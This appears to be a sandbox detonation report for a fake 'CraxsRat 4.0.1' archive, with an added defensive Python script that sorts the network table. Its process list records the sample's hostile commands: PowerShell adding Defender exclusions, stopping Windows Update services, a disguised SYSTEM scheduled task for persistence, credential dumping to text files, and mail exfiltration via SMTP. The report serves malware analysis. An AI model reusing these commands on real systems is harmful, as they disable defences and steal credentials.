N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3592 wrote to memory of 2712 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 1436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd62bd9758,0x7ffd62bd9768,0x7ffd62bd9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5524 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5680 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5820 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5964 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6112 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5692 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6368 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5304 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5784 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-622.exe

"C:\Users\Admin\Downloads\winrar-x64-622.exe"

C:\Program Files\WinRAR\uninstall.exe

"C:\Program Files\WinRAR\uninstall.exe" /setup

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\WinRAR\WinRAR.exe

"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ver -imon1 -- "C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip" "?\"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5148 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

"C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

Network

Country  Destination           Domain                            Proto
US       8.8.8.8:53            123.108.74.40.in-addr.arpa        udp
US       8.8.8.8:53            95.221.229.192.in-addr.arpa       udp
US       8.8.8.8:53            cdn.discordapp.com                udp
US       162.159.134.233:443   cdn.discordapp.com                tcp
US       8.8.8.8:53            195.179.250.142.in-addr.arpa      udp
US       8.8.8.8:53            233.134.159.162.in-addr.arpa      udp
US       8.8.8.8:53            71.159.190.20.in-addr.arpa        udp
N/A      224.0.0.251:5353      -                                 udp
US       8.8.8.8:53            97.17.167.52.in-addr.arpa         udp
US       8.8.8.8:53            228.249.119.40.in-addr.arpa       udp
US       8.8.8.8:53            241.150.49.20.in-addr.arpa        udp
US       8.8.8.8:53            196.168.217.172.in-addr.arpa      udp
US       8.8.8.8:53            apis.google.com                   udp
US       52.242.101.226:443    -                                 tcp
US       8.8.8.8:53            206.23.217.172.in-addr.arpa       udp
US       13.89.179.8:443       -                                 tcp
US       8.8.8.8:53            www.win-rar.com                   udp
DE       51.195.68.163:443     www.win-rar.com                   tcp
US       8.8.8.8:53            apps.identrust.com                udp
US       2.18.121.70:80        apps.identrust.com                tcp
US       8.8.8.8:53            131.179.250.142.in-addr.arpa      udp
US       8.8.8.8:53            163.68.195.51.in-addr.arpa        udp
US       8.8.8.8:53            70.121.18.2.in-addr.arpa          udp
US       8.8.8.8:53            content-autofill.googleapis.com   udp
GB       216.58.208.106:443    content-autofill.googleapis.com   tcp
US       8.8.8.8:53            106.208.58.216.in-addr.arpa       udp
US       8.8.8.8:53            play.google.com                   udp
NL       142.251.36.14:443     play.google.com                   tcp
NL       142.251.36.14:443     play.google.com                   udp
US       8.8.8.8:53            194.179.250.142.in-addr.arpa      udp
US       8.8.8.8:53            14.36.251.142.in-addr.arpa        udp
US       8.8.8.8:53            8.36.251.142.in-addr.arpa         udp
DE       51.195.68.163:443     www.win-rar.com                   tcp
NL       8.238.20.126:80       -                                 tcp
NL       173.223.113.164:443   -                                 tcp
NL       173.223.113.131:80    -                                 tcp
US       204.79.197.203:80     api.msn.com                       tcp
US       52.242.101.226:443    -                                 tcp
US       8.8.8.8:53            44.8.109.52.in-addr.arpa          udp
NL       8.238.20.126:80       -                                 tcp
US       52.242.101.226:443    -                                 tcp
US       8.8.8.8:53            183.59.114.20.in-addr.arpa        udp
US       8.8.8.8:53            206.23.85.13.in-addr.arpa         udp
US       8.8.8.8:53            beacons.gcp.gvt2.com              udp
US       192.178.49.163:443    beacons.gcp.gvt2.com              tcp
US       8.8.8.8:53            163.49.178.192.in-addr.arpa       udp
US       8.8.8.8:53            90.65.42.20.in-addr.arpa          udp
US       192.178.49.163:443    beacons.gcp.gvt2.com              udp
US       8.8.8.8:53            rentry.org                        udp
LU       198.251.88.130:443    rentry.org                        tcp
US       8.8.8.8:53            bitbucket.org                     udp
US       104.192.141.1:443     bitbucket.org                     tcp
US       8.8.8.8:53            whatismyipaddress.com             udp
US       104.16.155.36:80      whatismyipaddress.com             tcp
US       104.16.155.36:443     whatismyipaddress.com             tcp
US       8.8.8.8:53            130.88.251.198.in-addr.arpa       udp
US       8.8.8.8:53            1.141.192.104.in-addr.arpa        udp
US       8.8.8.8:53            36.155.16.104.in-addr.arpa        udp
US       8.8.8.8:53            smtp.zoho.com                     udp
US       136.143.190.56:587    smtp.zoho.com                     tcp
US       8.8.8.8:53            56.190.143.136.in-addr.arpa       udp
US       136.143.190.56:587    smtp.zoho.com                     tcp
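Most rows in this table are sandbox background: a reverse-DNS (in-addr.arpa) lookup for every peer, mDNS, and the Chrome, MSN, IdenTrust and win-rar.com traffic of the detonation environment itself. The verdict rests on the small remainder: the download from cdn.discordapp.com, the rentry.org and bitbucket.org fetches behind the "Legitimate hosting services abused" signature, the whatismyipaddress.com request behind "Looks up external IP address via web service", and the SMTP submission session to smtp.zoho.com:587, which for a sample that has just read Outlook account data and browser credential stores is almost certainly the channel they leave by. The script below is an added example, not part of the report: it parses rows in this table's layout (a subset copied into SAMPLE_TABLE), drops the noise classes and buckets the rest. The bucket names, the watch lists of shared-hosting and external-IP services, and the treatment of any SMTP port as a credential-exfiltration suspect are the example's assumptions.

```python
"""Bucket the rows of a sandbox network table into noise and the handful
of connections that carry the verdict.  Added example; bucket names and
watch lists are constructed for illustration, not the sandbox's own."""
from collections import defaultdict
from typing import Dict, List

# Constructed subset of the table above, same layout: country, ip:port,
# optional resolved name, protocol.
SAMPLE_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
N/A 224.0.0.251:5353 udp
US 52.242.101.226:443 tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 2.18.121.70:80 apps.identrust.com tcp
US 204.79.197.203:80 api.msn.com tcp
US 8.8.8.8:53 rentry.org udp
LU 198.251.88.130:443 rentry.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.16.155.36:80 whatismyipaddress.com tcp
US 104.16.155.36:443 whatismyipaddress.com tcp
US 8.8.8.8:53 smtp.zoho.com udp
US 136.143.190.56:587 smtp.zoho.com tcp
US 136.143.190.56:587 smtp.zoho.com tcp
"""

# Assumed watch lists; extend from your own intel.
SHARED_HOSTING = {"cdn.discordapp.com", "rentry.org", "bitbucket.org"}
EXTERNAL_IP_SERVICES = {"whatismyipaddress.com", "api.ipify.org", "ip-api.com"}
SMTP_PORTS = {"25", "465", "587"}


def parse_rows(table: str) -> List[Dict[str, str]]:
    """Split the whitespace-delimited table; the domain column may be absent."""
    rows = []
    for line in table.splitlines()[1:]:          # skip the header
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": port,
                     "domain": domain, "proto": proto})
    return rows


def classify(row: Dict[str, str]) -> str:
    """One bucket per row; noise buckets are tested first so they never mask a hit."""
    if row["domain"].endswith(".in-addr.arpa"):
        return "ptr_noise"              # sandbox reverse lookup of every peer
    if row["port"] == "5353":
        return "mdns_noise"
    if row["port"] == "53":
        return "dns"
    if row["port"] in SMTP_PORTS:
        return "smtp_submission"        # stealer mailing out what it harvested
    if row["domain"] in EXTERNAL_IP_SERVICES:
        return "external_ip_lookup"
    if row["domain"] in SHARED_HOSTING:
        return "shared_hosting"         # legitimate services used as payload/C2 hosts
    if not row["domain"]:
        return "unresolved_ip"
    return "background"


def summarize(table: str) -> Dict[str, List[str]]:
    """Bucket -> sorted unique endpoints (queried names for DNS rows)."""
    buckets = defaultdict(set)
    for row in parse_rows(table):
        tag = classify(row)
        if tag == "dns":
            buckets[tag].add(row["domain"])
        elif tag.endswith("_noise"):
            buckets[tag].add(f"{row['ip']}:{row['port']}")
        else:
            buckets[tag].add(f"{row['domain'] or row['ip']}:{row['port']}")
    return {tag: sorted(v) for tag, v in buckets.items()}


def verdict_signals(table: str) -> List[str]:
    """The buckets an analyst acts on, in the order they matter."""
    found = summarize(table)
    return [t for t in ("smtp_submission", "external_ip_lookup", "shared_hosting") if t in found]


if __name__ == "__main__":
    for tag, endpoints in summarize(SAMPLE_TABLE).items():
        print(f"{tag:20s} {', '.join(endpoints)}")
    print("act on:", verdict_signals(SAMPLE_TABLE))
```

Unresolved destinations (rows with no domain) are kept in their own bucket rather than discarded: in this report they are Microsoft and Akamai ranges reached by the sandbox's own Windows components, but a bare IP on a non-standard port is exactly what a C2 beacon looks like, so the bucket is worth a glance before it is written off.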

Files

\??\pipe\crashpad_3592_ACDOVCADOLTQUWVP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e0ce417311579804b8f9605efbf91a73
SHA1 25172b5b4c4cbce37636492a9497d86327c18a84
